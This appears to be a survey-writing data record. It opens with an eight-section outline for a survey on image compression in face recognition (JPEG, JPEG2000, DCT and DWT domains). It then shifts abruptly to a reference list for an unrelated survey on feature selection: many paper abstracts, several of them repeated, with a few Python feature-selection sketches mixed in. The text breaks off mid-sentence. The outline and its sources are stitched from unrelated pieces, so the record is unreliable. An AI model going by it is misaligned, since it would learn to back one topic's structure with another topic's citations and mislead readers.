Description 1: Introduce the topic of image compression in face recognition, discuss its relevance, and outline the structure of the survey.
Section 2: Spatial (pixel) domain
Description 2: Overview of research on the impact of degraded image quality due to compression on face recognition accuracy in the spatial (pixel) domain, focusing on JPEG and JPEG2000.
Section 3: JPEG2000
Description 3: Discussion of research on face recognition using images compressed with the JPEG2000 standard, including specific studies and their findings.
Section 4: Analysis
Description 4: Analysis of the reviewed studies, drawing conclusions about the impact of image compression on face recognition and identifying common experimental setups and their implications.
Section 5: Transform (compressed) domain
Description 5: Exploration of research on face recognition performed directly in the compressed (transform) domain using DCT and DWT coefficients.
Section 6: JPEG (DCT coefficients)
Description 6: Review of studies that utilize JPEG DCT coefficients for face recognition, detailing methodologies and findings.
Section 7: JPEG2000 (DWT coefficients)
Description 7: Review of research on using JPEG2000 DWT coefficients in face recognition, including an examination of wavelet-based recognition systems.
Section 8: Conclusions
Description 8: Summarize the key findings from the literature survey, discuss the implications of compression on face recognition accuracy, and suggest areas for future research.
Feature Selection: A literature Review
13
--- paper_title: Feature selection algorithms: a survey and experimental evaluation paper_content: In view of the substantial number of existing feature selection algorithms, the need arises to count on criteria that enables to adequately decide which algorithm to use in certain situations. This work assesses the performance of several fundamental algorithms found in the literature in a controlled scenario. A scoring measure ranks the algorithms by taking into account the amount of relevance, irrelevance and redundance on sample data sets. This measure computes the degree of matching between the output given by the algorithm and the known optimal solution. Sample size effects are also studied. --- paper_title: Stability of feature selection algorithms: a study on high-dimensional spaces paper_content: With the proliferation of extremely high-dimensional data, feature selection algorithms have become indispensable components of the learning process. Strangely, despite extensive work on the stability of learning algorithms, the stability of feature selection algorithms has been relatively neglected. This study is an attempt to fill that gap by quantifying the sensitivity of feature selection algorithms to variations in the training set. We assess the stability of feature selection algorithms based on the stability of the feature preferences that they express in the form of weights-scores, ranks, or a selected feature subset. We examine a number of measures to quantify the stability of feature preferences and propose an empirical way to estimate them. We perform a series of experiments with several feature selection algorithms on a set of proteomics datasets. The experiments allow us to explore the merits of each stability measure and create stability profiles of the feature selection algorithms. Finally, we show how stability profiles can support the choice of a feature selection algorithm. --- paper_title: Poem Classification Using Machine Learning Approach paper_content: The collection of poems is ever increasing on the Internet. Therefore, classification of poems is an important task along with their labels. The work in this paper is aimed to find the best classification algorithms among the K-nearest neighbor (KNN), Naive Bayesian (NB) and Support Vector Machine (SVM) with reduced features. Information Gain Ratio is used for feature selection. The results show that SVM has maximum accuracy (93.25 %) using 20 % top ranked features. --- paper_title: Concept-Based Feature Generation and Selection for Information Retrieval paper_content: Traditional information retrieval systems use query words to identify relevant documents. In difficult retrieval tasks, however, one needs access to a wealth of background knowledge. We present a method that uses Wikipedia-based feature generation to improve retrieval performance. Intuitively, we expect that using extensive world knowledge is likely to improve recall but may adversely affect precision. High quality feature selection is necessary to maintain high precision, but here we do not have the labeled training data for evaluating features, that we have in supervised learning. We present a new feature selection method that is inspired by pseudorelevance feedback. We use the top-ranked and bottom-ranked documents retrieved by the bag-of-words method as representative sets of relevant and non-relevant documents. The generated features are then evaluated and filtered on the basis of these sets. 
Experiments on TREC data confirm the superior performance of our method compared to the previous state of the art. --- paper_title: Robust Feature Selection Using Ensemble Feature Selection Techniques paper_content: Robustness or stability of feature selection techniques is a topic of recent interest, and is an important issue when selected feature subsets are subsequently analysed by domain experts to gain more insight into the problem modelled. In this work, we investigate the use of ensemble feature selection techniques, where multiple feature selection methods are combined to yield more robust results. We show that these techniques show great promise for high-dimensional domains with small sample sizes, and provide more robust feature subsets than a single feature selection technique. In addition, we also investigate the effect of ensemble feature selection techniques on classification performance, giving rise to a new model selection strategy. --- paper_title: Generalizability and Simplicity as Criteria in Feature Selection: Application to Mood Classification in Music paper_content: Classification of musical audio signals according to expressed mood or emotion has evident applications to content-based music retrieval in large databases. Wrapper selection is a dimension reduction method that has been proposed for improving classification performance. However, the technique is prone to lead to overfitting of the training data, which decreases the generalizability of the obtained results. We claim that previous attempts to apply wrapper selection in the field of music information retrieval (MIR) have led to disputable conclusions about the used methods due to inadequate analysis frameworks, indicative of overfitting, and biased results. This paper presents a framework based on cross-indexing for obtaining realistic performance estimate of wrapper selection by taking into account the simplicity and generalizability of the classification models. The framework is applied on sets of film soundtrack excerpts that are consensually associated with particular basic emotions, comparing Naive Bayes, k-NN, and SVM classifiers using both forward selection (FS) and backward elimination (BE). K-NN with BE yields the most promising results - 56.5% accuracy with only four features. The most useful feature subset for k-NN contains mode majorness and key clarity, combined with dynamical, rhythmical, and structural features. --- paper_title: A feature selection algorithm capable of handling extremely large data dimensionality paper_content: With the advent of high throughput technologies, feature selection has become increasingly important in a wide range of scientific disciplines. We propose a new feature selection algorithm that performs extremely well in the presence of a huge number of irrelevant features. The key idea is to decompose an arbitrarily complex nonlinear models into a set of locally linear ones through local learning, and then estimate feature relevance globally within a large margin framework. The algorithm is capable of processing many thousands of features within a few minutes on a personal computer, yet maintains a close-to-optimum accuracy that is nearly insensitive to a growing number of irrelevant features. Experiments on eight synthetic and real-world datasets are presented that demonstrate the effectiveness of the algorithm. 
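As a rough illustration of the rank-aggregation idea behind the ensemble feature selection work summarized above, the following Python sketch scores features with several univariate filters and keeps the features with the best average rank. It is not the method of any single cited paper; the scikit-learn filters, the synthetic dataset, and the value of k are placeholder assumptions.

```python
# Illustrative sketch: ensemble (rank-aggregation) feature selection.
# Several univariate filters score the features independently; their
# rankings are averaged and the top-k features by mean rank are kept.
import numpy as np
from sklearn.datasets import make_classification
from sklearn.feature_selection import f_classif, mutual_info_classif, chi2
from sklearn.preprocessing import MinMaxScaler

def ensemble_rank_selection(X, y, k=10):
    scorers = [
        lambda X, y: f_classif(X, y)[0],          # ANOVA F-score
        lambda X, y: mutual_info_classif(X, y),   # mutual information
        lambda X, y: chi2(X, y)[0],               # chi-squared (needs non-negative X)
    ]
    X_pos = MinMaxScaler().fit_transform(X)       # make features non-negative for chi2
    ranks = []
    for score in scorers:
        s = score(X_pos, y)
        # higher score -> better rank (rank 0 is best)
        ranks.append(np.argsort(np.argsort(-s)))
    mean_rank = np.mean(ranks, axis=0)
    return np.argsort(mean_rank)[:k]              # indices of the k top-ranked features

if __name__ == "__main__":
    X, y = make_classification(n_samples=200, n_features=50,
                               n_informative=5, random_state=0)
    print(ensemble_rank_selection(X, y, k=5))
```

Averaging ranks rather than raw scores sidesteps the need to put the heterogeneous filter scores on a common scale.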
--- paper_title: An extensive empirical study of feature selection metrics for text classification paper_content: Machine learning for text classification is the cornerstone of document categorization, news filtering, document routing, and personalization. In text domains, effective feature selection is essential to make the learning task efficient and more accurate. This paper presents an empirical comparison of twelve feature selection methods (e.g. Information Gain) evaluated on a benchmark of 229 text classification problem instances that were gathered from Reuters, TREC, OHSUMED, etc. The results are analyzed from multiple goal perspectives-accuracy, F-measure, precision, and recall-since each is appropriate in different situations. The results reveal that a new feature selection metric we call 'Bi-Normal Separation' (BNS), outperformed the others by a substantial margin in most situations. This margin widened in tasks with high class skew, which is rampant in text classification problems and is particularly challenging for induction algorithms. A new evaluation methodology is offered that focuses on the needs of the data mining practitioner faced with a single dataset who seeks to choose one (or a pair of) metrics that are most likely to yield the best performance. From this perspective, BNS was the top single choice for all goals except precision, for which Information Gain yielded the best result most often. This analysis also revealed, for example, that Information Gain and Chi-Squared have correlated failures, and so they work poorly together. When choosing optimal pairs of metrics for each of the four performance goals, BNS is consistently a member of the pair---e.g., for greatest recall, the pair BNS + F1-measure yielded the best performance on the greatest number of tasks by a considerable margin. --- paper_title: An ensemble of filters and classifiers for microarray data classification paper_content: In this paper a new framework for feature selection consisting of an ensemble of filters and classifiers is described. Five filters, based on different metrics, were employed. Each filter selects a different subset of features which is used to train and to test a specific classifier. The outputs of these five classifiers are combined by simple voting. In this study three well-known classifiers were employed for the classification task: C4.5, naive-Bayes and IB1. The rationale of the ensemble is to reduce the variability of the features selected by filters in different classification domains. Its adequacy was demonstrated by employing 10 microarray data sets. --- paper_title: Unsupervised Feature Selection Applied to Content-Based Retrieval of Lung Images paper_content: This paper describes a new hierarchical approach to content-based image retrieval called the "customized-queries" approach (CQA). Contrary to the single feature vector approach which tries to classify the query and retrieve similar images in one step, CQA uses multiple feature sets and a two-step approach to retrieval. The first step classifies the query according to the class labels of the images using the features that best discriminate the classes. The second step then retrieves the most similar images within the predicted class using the features customized to distinguish "subclasses" within that class. Needing to find the customized feature subset for each class led us to investigate feature selection for unsupervised learning. 
As a result, we developed a new algorithm called FSSEM (feature subset selection using expectation-maximization clustering). We applied our approach to a database of high resolution computed tomography lung images and show that CQA radically improves the retrieval precision over the single feature vector approach. To determine whether our CBIR system is helpful to physicians, we conducted an evaluation trial with eight radiologists. The results show that our system using CQA retrieval doubled the doctors' diagnostic accuracy. --- paper_title: Feature selection with ensembles, artificial variables, and redundancy elimination paper_content: Predictive models benefit from a compact, non-redundant subset of features that improves interpretability and generalization. Modern data sets are wide, dirty, mixed with both numerical and categorical predictors, and may contain interactive effects that require complex models. This is a challenge for filters, wrappers, and embedded feature selection methods. We describe details of an algorithm using tree-based ensembles to generate a compact subset of non-redundant features. Parallel and serial ensembles of trees are combined into a mixed method that can uncover masking and detect features of secondary effect. Simulated and actual examples illustrate the effectiveness of the approach. --- paper_title: Adaptive Intrusion Detection: A Data Mining Approach paper_content: In this paper we describe a data mining framework for constructingintrusion detection models. The first key idea is to mine system auditdata for consistent and useful patterns of program and user behavior.The other is to use the set of relevant system features presented inthe patterns to compute inductively learned classifiers that canrecognize anomalies and known intrusions. In order for the classifiersto be effective intrusion detection models, we need to have sufficientaudit data for training and also select a set of predictive systemfeatures. We propose to use the association rules and frequentepisodes computed from audit data as the basis for guiding the auditdata gathering and feature selection processes. We modify these twobasic algorithms to use axis attribute(s) and referenceattribute(s) as forms of item constraints to compute only therelevant patterns. In addition, we use an iterative level-wiseapproximate mining procedure to uncover the low frequency butimportant patterns. We use meta-learning as a mechanism to makeintrusion detection models more effective and adaptive. We report ourextensive experiments in using our framework on real-world audit data. --- paper_title: Causal filter selection in microarray data paper_content: The importance of bringing causality into play when designing feature selection methods is more and more acknowledged in the machine learning community. This paper proposes a filter approach based on information theory which aims to prioritise direct causal relationships in feature selection problems where the ratio between the number of features and the number of samples is high. This approach is based on the notion of interaction which is shown to be informative about the relevance of an input subset as well as its causal relationship with the target. The resulting filter, called mIMR (min-Interaction Max-Relevance), is compared with state-of-the-art approaches. Classification results on 25 real microarray datasets show that the incorporation of causal aspects in the feature assessment is beneficial both for the resulting accuracy and stability. 
A toy example of causal discovery shows the effectiveness of the filter for identifying direct causal relationships. --- paper_title: Gene selection algorithm by combining reliefF and mRMR paper_content: BackgroundGene expression data usually contains a large number of genes, but a small number of samples. Feature selection for gene expression data aims at finding a set of genes that best discriminate biological samples of different types. In this paper, we present a two-stage selection algorithm by combining ReliefF and mRMR: In the first stage, ReliefF is applied to find a candidate gene set; In the second stage, mRMR method is applied to directly and explicitly reduce redundancy for selecting a compact yet effective gene subset from the candidate set.ResultsWe perform comprehensive experiments to compare the mRMR-ReliefF selection algorithm with ReliefF, mRMR and other feature selection methods using two classifiers as SVM and Naive Bayes, on seven different datasets. And we also provide all source codes and datasets for sharing with others.ConclusionThe experimental results show that the mRMR-ReliefF gene selection algorithm is very effective. --- paper_title: Highly discriminative statistical features for email classification paper_content: This paper reports on email classification and filtering, more specifically on spam versus ham and phishing versus spam classification, based on content features. We test the validity of several novel statistical feature extraction methods. The methods rely on dimensionality reduction in order to retain the most informative and discriminative features. We successfully test our methods under two schemas. The first one is a classic classification scenario using a 10-fold cross-validation technique for several corpora, including four ground truth standard corpora: Ling-Spam, SpamAssassin, PU1, and a subset of the TREC 2007 spam corpus, and one proprietary corpus. In the second schema, we test the anticipatory properties of our extracted features and classification models with two proprietary datasets, formed by phishing and spam emails sorted by date, and with the public TREC 2007 spam corpus. The contributions of our work are an exhaustive comparison of several feature selection and extraction methods in the frame of email classification on different benchmarking corpora, and the evidence that especially the technique of biased discriminant analysis offers better discriminative features for the classification, gives stable classification results notwithstanding the amount of features chosen, and robustly retains their discriminative value over time and data setups. These findings are especially useful in a commercial setting, where short profile rules are built based on a limited number of features for filtering emails. --- paper_title: Feature Selection Using Mutual Information: An Experimental Study paper_content: In real-world application, data is often represented by hundreds or thousands of features. Most of them, however, are redundant or irrelevant, and their existence may straightly lead to poor performance of learning algorithms. Hence, it is a compelling requisition for their practical applications to choose most salient features. Currently, a large number of feature selection methods using various strategies have been proposed. Among these methods, the mutual information ones have recently gained much more popularity. In this paper, a general criterion function for feature selector using mutual information is firstly introduced. 
This function can bring up-to-date selectors based on mutual information together under an unifying scheme. Then an experimental comparative study of eight typical filter mutual information based feature selection algorithms on thirty-three datasets is presented. We evaluate them from four essential aspects, and the experimental results show that none of these methods outperforms others significantly. Even so, the conditional mutual information feature selection algorithm dominates other methods on the whole, if training time is not a matter. --- paper_title: Correlation-based Feature Selection for Machine Learning paper_content: A central problem in machine learning is identifying a representative set of features from which to construct a classification model for a particular task. This thesis addresses the problem of feature selection for machine learning through a correlation based approach. The central hypothesis is that good feature sets contain features that are highly correlated with the class, yet uncorrelated with each other. A feature evaluation formula, based on ideas from test theory, provides an operational definition of this hypothesis. CFS (Correlation based Feature Selection) is an algorithm that couples this evaluation formula with an appropriate correlation measure and a heuristic search strategy. CFS was evaluated by experiments on artificial and natural datasets. Three machine learning algorithms were used: C4.5 (a decision tree learner), IB1 (an instance based learner), and naive Bayes. Experiments on artificial datasets showed that CFS quickly identifies and screens irrelevant, redundant, and noisy features, and identifies relevant features as long as their relevance does not strongly depend on other features. On natural domains, CFS typically eliminated well over half the features. In most cases, classification accuracy using the reduced feature set equaled or bettered accuracy using the complete feature set. Feature selection degraded machine learning performance in cases where some features were eliminated which were highly predictive of very small areas of the instance space. Further experiments compared CFS with a wrapper—a well known approach to feature selection that employs the target learning algorithm to evaluate feature sets. In many cases CFS gave comparable results to the wrapper, and in general, outperformed the wrapper on small datasets. CFS executes many times faster than the wrapper, which allows it to scale to larger datasets. Two methods of extending CFS to handle feature interaction are presented and experimentally evaluated. The first considers pairs of features and the second incorporates iii feature weights calculated by the RELIEF algorithm. Experiments on artificial domains showed that both methods were able to identify interacting features. On natural domains, the pairwise method gave more reliable results than using weights provided by RELIEF. --- paper_title: Feature selection algorithms: a survey and experimental evaluation paper_content: In view of the substantial number of existing feature selection algorithms, the need arises to count on criteria that enables to adequately decide which algorithm to use in certain situations. This work assesses the performance of several fundamental algorithms found in the literature in a controlled scenario. A scoring measure ranks the algorithms by taking into account the amount of relevance, irrelevance and redundance on sample data sets. 
This measure computes the degree of matching between the output given by the algorithm and the known optimal solution. Sample size effects are also studied. --- paper_title: Customer Retention via Data Mining paper_content: ``Customer Retention'' is an increasingly pressing issue in today's ever-competitive commercial arena. This is especially relevant and important for sales and services related industries. Motivated by a real-world problem faced by a large company, we proposed a solution that integrates various techniques of data mining, such as feature selection via induction, deviation analysis, and mining multiple concept-level association rules to form an intuitive and novel approach to gauging customer loyalty and predicting their likelihood of defection. Immediate action triggered by these ``early-warnings'' resulting from data mining is often the key to eventual customer retention. --- paper_title: Implementing ReliefF filters to extract meaningful features from genetic lifetime datasets paper_content: BackgroundThe analysis of survival data allows to evaluate whether in a population the genetic exposure is related to the time until an event occurs. Owing to the complexity of common human diseases, there is the incipient need to develop bioinformatics tools to properly model non-linear high-order interactions in lifetime datasets. These tools, such as the survival dimensionality reduction algorithm, may suffer from extreme computational costs in large-scale datasets. Herein, we address the problem of estimating the quality of attributes, so as to extract relevant features from lifetime datasets and to scale down their size. MethodsThe ReliefF algorithm was modified and adjusted to compensate for the loss of information due to censoring, introducing reclassification and weighting schemes. Synthetic lifetime two-locus epistatic datasets of 500 attributes, 400-800 individuals and different degrees of cumulative heritability and censorship were generated. The capability of the survival ReliefF algorithm (sReliefF) and of a tuned sReliefF approach to properly select the causative pair of attributes was evaluated and compared to univariate selection based on Cox scores. Results/conclusionssReliefF methods efficiently scaled down the simulated datasets, whilst univariate selection performed no better than random choice. These approaches may help to reduce the computational cost and to improve the classification task of algorithms that model high-order interactions in presence of right-censored data. Availability: http://sourceforge.net/projects/sdrproject/files/sReliefF/. --- paper_title: Greedy Attribute Selection paper_content: Abstract Many real-world domains bless us with a wealth of attributes to use for learning. This blessing is often a curse: most inductive methods generalize worse given too many attributes than if given a good subset of those attributes. We examine this problem for two learning tasks taken from a calendar scheduling domain. We show that ID3/C4.5 generalizes poorly on these tasks if allowed to use all available attributes. We examine five greedy hillclimbing procedures that search for attribute sets that generalize well with ID3/C4.5. Experiments suggest hillclimbing in attribute space can yield substantial improvements in generalization performance. We present a caching scheme that makes attribute hillclimbing more practical computationally. We also compare the results of hillclimbing in attribute space with FOCUS and RELIEF on the two tasks. 
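The greedy hillclimbing search in attribute space described in the preceding abstract can be sketched as a simple wrapper. The sketch below assumes a scikit-learn-style learner (a decision tree stands in for ID3/C4.5), and the dataset and stopping rule are illustrative rather than those of the cited work: each step adds the single feature that most improves cross-validated accuracy and stops when no addition helps.

```python
# Illustrative sketch: greedy forward selection in attribute space (a wrapper).
# At each step the feature whose addition most improves cross-validated
# accuracy of the learner is added; the search stops when nothing improves.
import numpy as np
from sklearn.datasets import load_breast_cancer
from sklearn.model_selection import cross_val_score
from sklearn.tree import DecisionTreeClassifier

def greedy_forward_selection(X, y, estimator, cv=5):
    remaining = list(range(X.shape[1]))
    selected, best_score = [], -np.inf
    while remaining:
        scores = [(np.mean(cross_val_score(estimator, X[:, selected + [f]], y, cv=cv)), f)
                  for f in remaining]
        score, f = max(scores)
        if score <= best_score:          # hillclimbing: stop when no improvement
            break
        selected.append(f)
        remaining.remove(f)
        best_score = score
    return selected, best_score

if __name__ == "__main__":
    X, y = load_breast_cancer(return_X_y=True)
    subset, acc = greedy_forward_selection(X, y, DecisionTreeClassifier(random_state=0))
    print(subset, round(acc, 3))
```

Backward elimination is the mirror image of this loop: start from the full feature set and drop the feature whose removal hurts cross-validated accuracy the least.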
--- paper_title: Iterative RELIEF for feature weighting paper_content: We propose a series of new feature weighting algorithms, all stemming from a new interpretation of RELIEF as an online algorithm that solves a convex optimization problem with a margin-based objective function. The new interpretation explains the simplicity and effectiveness of RELIEF, and enables us to identify some of its weaknesses. We offer an analytic solution to mitigate these problems. We extend the newly proposed algorithm to handle multiclass problems by using a new multiclass margin definition. To reduce computational costs, an online learning algorithm is also developed. Convergence theorems of the proposed algorithms are presented. Some experiments based on the UCI and microarray datasets are performed to demonstrate the effectiveness of the proposed algorithms. --- paper_title: Performance of feature-selection methods in the classification of high-dimension data paper_content: Contemporary biological technologies produce extremely high-dimensional data sets from which to design classifiers, with 20,000 or more potential features being common place. In addition, sample sizes tend to be small. In such settings, feature selection is an inevitable part of classifier design. Heretofore, there have been a number of comparative studies for feature selection, but they have either considered settings with much smaller dimensionality than those occurring in current bioinformatics applications or constrained their study to a few real data sets. This study compares some basic feature-selection methods in settings involving thousands of features, using both model-based synthetic data and real data. It defines distribution models involving different numbers of markers (useful features) versus non-markers (useless features) and different kinds of relations among the features. Under this framework, it evaluates the performances of feature-selection algorithms for different distribution models and classifiers. Both classification error and the number of discovered markers are computed. Although the results clearly show that none of the considered feature-selection methods performs best across all scenarios, there are some general trends relative to sample size and relations among the features. For instance, the classifier-independent univariate filter methods have similar trends. Filter methods such as the t-test have better or similar performance with wrapper methods for harder problems. This improved performance is usually accompanied with significant peaking. Wrapper methods have better performance when the sample size is sufficiently large. ReliefF, the classifier-independent multivariate filter method, has worse performance than univariate filter methods in most cases; however, ReliefF-based wrapper methods show performance similar to their t-test-based counterparts. --- paper_title: Feature selection for high-dimensional genomic microarray data paper_content: We report on the successful application of feature selection methods to a classification problem in molecular biology involving only 72 data points in a 7130 dimensional space. Our approach is a hybrid of filter and wrapper approaches to feature selection. We make use of a sequence of simple filters, culminating in Koller and Sahami’s (1996) Markov Blanket filter, to decide on particular feature subsets for each subset cardinality. We compare between the resulting subset cardinalities using cross validation. 
The paper also investigates regularization methods as an alternative to feature selection, showing that feature selection methods are preferable in this problem. --- paper_title: Feature selection and classification in multiple class datasets: An application to KDD Cup 99 dataset paper_content: Research highlights? A combination of discretizers, filters and classifiers is presented. ? This combination is applied to binary and multiple class classification problems. ? Its performance is compared to KDD Cup winner and other methods results. ? It achieves better performance while significantly reduces the number of features. In this work, a new method consisting of a combination of discretizers, filters and classifiers is presented. Its aim is to improve the performance results of classifiers but using a significantly reduced set of features. The method has been applied to a binary and to a multiple class classification problem. Specifically, the KDD Cup 99 benchmark was used for testing its effectiveness. A comparative study with other methods and the KDD winner was accomplished. The results obtained showed the adequacy of the proposed method, achieving better performance in most cases while reducing the number of features in more than 80%. --- paper_title: A GA-based Feature Selection Algorithm for Remote Sensing Images paper_content: We present a GA-based feature selection algorithm in which feature subsets are evaluated by means of a separability index. This index is based on a filter method, which allows to estimate statistical properties of the data, independently of the classifier used. More specifically, the defined index uses covariance matrices for evaluating how spread out the probability distributions of data are in a given n-dimensional space. The effectiveness of the approach has been tested on two satellite images and the results have been compared with those obtained without feature selection and with those obtained by using a previously developed GA-based feature selection algorithm. --- paper_title: Obtaining scalable and accurate classification in large-scale spatio-temporal domains paper_content: We present an approach for learning models that obtain accurate classification of data objects, collected in large-scale spatio-temporal domains. The model generation is structured in three phases: spatial dimension reduction, spatio-temporal features extraction, and feature selection. Novel techniques for the first two phases are presented, with two alternatives for the middle phase. We explore model generation based on the combinations of techniques from each phase. We apply the introduced methodology to data-sets from the Voltage-Sensitive Dye Imaging (VSDI) domain, where the resulting classification models successfully decode neuronal population responses in the visual cortex of behaving animals. VSDI is currently the best technique enabling simultaneous high spatial (10,000 points) and temporal (10 ms or less) resolution imaging from neuronal population in the cortex. We demonstrate that not only our approach is scalable enough to handle computationally challenging data, but it also contributes to the neuroimaging field of study with its decoding abilities. The effectiveness of our methodology is further explored on a data-set from the hurricanes domain, and a promising direction, based on the preliminary results of hurricane severity classification, is revealed. 
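A minimal sketch of the "combination of discretizers, filters and classifiers" idea summarized above is given below. The scikit-learn components, number of bins, value of k, and dataset are placeholder assumptions, not the configuration of the cited KDD Cup 99 study.

```python
# Illustrative sketch: a discretizer -> filter -> classifier pipeline.
# Features are binned, a univariate filter keeps the k most informative
# ones, and a simple classifier is trained on the reduced set.
from sklearn.datasets import load_breast_cancer
from sklearn.feature_selection import SelectKBest, mutual_info_classif
from sklearn.model_selection import cross_val_score
from sklearn.naive_bayes import GaussianNB
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import KBinsDiscretizer

pipe = Pipeline([
    ("discretize", KBinsDiscretizer(n_bins=5, encode="ordinal", strategy="uniform")),
    ("filter", SelectKBest(score_func=mutual_info_classif, k=10)),
    ("clf", GaussianNB()),
])

X, y = load_breast_cancer(return_X_y=True)
print(cross_val_score(pipe, X, y, cv=5).mean())  # accuracy with the reduced feature set
```

Wrapping the three stages in a single pipeline keeps discretization and feature selection inside each cross-validation fold, which avoids leaking information from the test folds into the selection step.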
--- paper_title: Redundancy based feature selection for microarray data paper_content: In gene expression microarray data analysis, selecting a small number of discriminative genes from thousands of genes is an important problem for accurate classification of diseases or phenotypes. The problem becomes particularly challenging due to the large number of features (genes) and small sample size. Traditional gene selection methods often select the top-ranked genes according to their individual discriminative power without handling the high degree of redundancy among the genes. Latest research shows that removing redundant genes among selected ones can achieve a better representation of the characteristics of the targeted phenotypes and lead to improved classification accuracy. Hence, we study in this paper the relationship between feature relevance and redundancy and propose an efficient method that can effectively remove redundant genes. The efficiency and effectiveness of our method in comparison with representative methods has been demonstrated through an empirical study using public microarray data sets. --- paper_title: Toward integrating feature selection algorithms for classification and clustering paper_content: This paper introduces concepts and algorithms of feature selection, surveys existing feature selection algorithms for classification and clustering, groups and compares different algorithms with a categorizing framework based on search strategies, evaluation criteria, and data mining tasks, reveals unattempted combinations, and provides guidelines in selecting feature selection algorithms. With the categorizing framework, we continue our efforts toward-building an integrated system for intelligent feature selection. A unifying platform is proposed as an intermediate step. An illustrative example is presented to show how existing feature selection algorithms can be integrated into a meta algorithm that can take advantage of individual algorithms. An added advantage of doing so is to help a user employ a suitable algorithm without knowing details of each algorithm. Some real-world applications are included to demonstrate the use of feature selection in data mining. We conclude this work by identifying trends and challenges of feature selection research and development. --- paper_title: Feature Selection for Classification paper_content: Feature selection has been the focus of interest for quite some time and much work has been done. With the creation of huge databases and the consequent requirements for good machine learning techniques, new problems arise and novel approaches to feature selection are in demand. This survey is a comprehensive overview of many existing methods from the 1970's to the present. It identifies four steps of a typical feature selection method, and categorizes the different existing methods in terms of generation procedures and evaluation functions, and reveals hitherto unattempted combinations of generation procedures and evaluation functions. Representative methods are chosen from each category for detailed explanation and discussion via example. Benchmark datasets with different characteristics are used for comparative study. The strengths and weaknesses of different methods are explained. Guidelines for applying feature selection methods are given based on data types and domain characteristics. 
This survey identifies the future research areas in feature selection, introduces newcomers to this field, and paves the way for practitioners who search for suitable methods for solving domain-specific real-world applications. --- paper_title: A Branch and Bound Algorithm for Feature Subset Selection paper_content: A feature subset selection algorithm based on branch and bound techniques is developed to select the best subset of m features from an n-feature set. Existing procedures for feature subset selection, such as sequential selection and dynamic programming, do not guarantee optimality of the selected feature subset. Exhaustive search, on the other hand, is generally computationally unfeasible. The present algorithm is very efficient and it selects the best subset without exhaustive search. Computational aspects of the algorithm are discussed. Results of several experiments demonstrate the very substantial computational savings realized. For example, the best 12-feature set from a 24-feature set was selected with the computational effort of evaluating only 6000 subsets. Exhaustive search would require the evaluation of 2 704 156 subsets. --- paper_title: Feature Selection for Knowledge Discovery and Data Mining paper_content: From the Publisher: ::: With advanced computer technologies and their omnipresent usage, data accumulates in a speed unmatchable by the human's capacity to process data. To meet this growing challenge, the research community of knowledge discovery from databases emerged. The key issue studied by this community is, in layman's terms, to make advantageous use of large stores of data. In order to make raw data useful, it is necessary to represent, process, and extract knowledge for various applications. Feature Selection for Knowledge Discovery and Data Mining offers an overview of the methods developed since the 1970's and provides a general framework in order to examine these methods and categorize them. This book employs simple examples to show the essence of representative feature selection methods and compares them using data sets with combinations of intrinsic properties according to the objective of feature selection. In addition, the book suggests guidelines for how to use different methods under various circumstances and points out new challenges in this exciting area of research. Feature Selection for Knowledge Discovery and Data Mining is intended to be used by researchers in machine learning, data mining, knowledge discovery, and databases as a toolbox of relevant tools that help in solving large real-world problems. This book is also intended to serve as a reference book or secondary text for courses on machine learning, data mining, and databases. --- paper_title: An Introduction to Variable and Feature Selection paper_content: Variable and feature selection have become the focus of much research in areas of application for which datasets with tens or hundreds of thousands of variables are available. These areas include text processing of internet documents, gene expression array analysis, and combinatorial chemistry. The objective of variable selection is three-fold: improving the prediction performance of the predictors, providing faster and more cost-effective predictors, and providing a better understanding of the underlying process that generated the data. 
The contributions of this special issue cover a wide range of aspects of such problems: providing a better definition of the objective function, feature construction, feature ranking, multivariate feature selection, efficient search methods, and feature validity assessment methods. --- paper_title: Greedy Attribute Selection paper_content: Abstract Many real-world domains bless us with a wealth of attributes to use for learning. This blessing is often a curse: most inductive methods generalize worse given too many attributes than if given a good subset of those attributes. We examine this problem for two learning tasks taken from a calendar scheduling domain. We show that ID3/C4.5 generalizes poorly on these tasks if allowed to use all available attributes. We examine five greedy hillclimbing procedures that search for attribute sets that generalize well with ID3/C4.5. Experiments suggest hillclimbing in attribute space can yield substantial improvements in generalization performance. We present a caching scheme that makes attribute hillclimbing more practical computationally. We also compare the results of hillclimbing in attribute space with FOCUS and RELIEF on the two tasks. --- paper_title: Selection of relevant features and examples in machine learning paper_content: Abstract In this survey, we review work in machine learning on methods for handling data sets containing large amounts of irrelevant information. We focus on two key issues: the problem of selecting relevant features, and the problem of selecting relevant examples. We describe the advances that have been made on these topics in both empirical and theoretical work in machine learning, and we present a general framework that we use to compare different methods. We close with some challenges for future work in this area. --- paper_title: Wrappers for feature subset selection paper_content: Abstract In the feature subset selection problem, a learning algorithm is faced with the problem of selecting a relevant subset of features upon which to focus its attention, while ignoring the rest. To achieve the best possible performance with a particular learning algorithm on a particular training set, a feature subset selection method should consider how the algorithm and the training set interact. We explore the relation between optimal feature subset selection and relevance. Our wrapper method searches for an optimal feature subset tailored to a particular algorithm and a domain. We study the strengths and weaknesses of the wrapper approach and show a series of improved designs. We compare the wrapper approach to induction without feature subset selection and to Relief, a filter approach to feature subset selection. Significant improvement in accuracy is achieved for some datasets for the two families of induction algorithms used: decision trees and Naive-Bayes. --- paper_title: Feature Selection for Classification paper_content: Feature selection has been the focus of interest for quite some time and much work has been done. With the creation of huge databases and the consequent requirements for good machine learning techniques, new problems arise and novel approaches to feature selection are in demand. This survey is a comprehensive overview of many existing methods from the 1970's to the present. 
It identifies four steps of a typical feature selection method, and categorizes the different existing methods in terms of generation procedures and evaluation functions, and reveals hitherto unattempted combinations of generation procedures and evaluation functions. Representative methods are chosen from each category for detailed explanation and discussion via example. Benchmark datasets with different characteristics are used for comparative study. The strengths and weaknesses of different methods are explained. Guidelines for applying feature selection methods are given based on data types and domain characteristics. This survey identifies the future research areas in feature selection, introduces newcomers to this field, and paves the way for practitioners who search for suitable methods for solving domain-specific real-world applications. --- paper_title: Feature Selection for Knowledge Discovery and Data Mining paper_content: From the Publisher: ::: With advanced computer technologies and their omnipresent usage, data accumulates in a speed unmatchable by the human's capacity to process data. To meet this growing challenge, the research community of knowledge discovery from databases emerged. The key issue studied by this community is, in layman's terms, to make advantageous use of large stores of data. In order to make raw data useful, it is necessary to represent, process, and extract knowledge for various applications. Feature Selection for Knowledge Discovery and Data Mining offers an overview of the methods developed since the 1970's and provides a general framework in order to examine these methods and categorize them. This book employs simple examples to show the essence of representative feature selection methods and compares them using data sets with combinations of intrinsic properties according to the objective of feature selection. In addition, the book suggests guidelines for how to use different methods under various circumstances and points out new challenges in this exciting area of research. Feature Selection for Knowledge Discovery and 